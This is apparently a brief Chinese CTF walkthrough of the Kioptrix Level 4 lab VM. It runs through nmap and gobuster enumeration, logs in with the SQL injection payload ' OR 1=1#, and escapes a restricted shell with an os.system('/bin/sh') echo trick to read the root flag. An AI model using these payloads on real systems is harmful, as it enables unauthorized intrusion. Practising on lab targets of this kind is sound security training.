Vulhub Kioptix Level 4

知识点

  • sql注入
  • 获取非受限的shell

主机发现

netdiscover 

在这里插入图片描述

端口扫描

 nmap -p-   --min-rate=1000 192.168.80.5 >port
 ports=$(cat port | awk -F " " '{print $1}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/[^0-9]*//')
 nmap -sC -sV -T4 -p $ports 192.168.80.5 -oA nmap/nmap

Vulhub Kioptix Level 4_第1张图片

信息收集

gobuster dir -u http://192.168.80.5 -w /usr/share/wordlists/dirb/big.txt -t50  -o dir.out 

Vulhub Kioptix Level 4_第2张图片
Vulhub Kioptix Level 4_第3张图片
Vulhub Kioptix Level 4_第4张图片

john
' OR 1=1#

Vulhub Kioptix Level 4_第5张图片
Vulhub Kioptix Level 4_第6张图片

提权

ssh [email protected]
  • 获取非受限的shell
echo python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
cd /root
cat congrats.txt

Vulhub Kioptix Level 4_第7张图片

你可能感兴趣的:(VULHUB)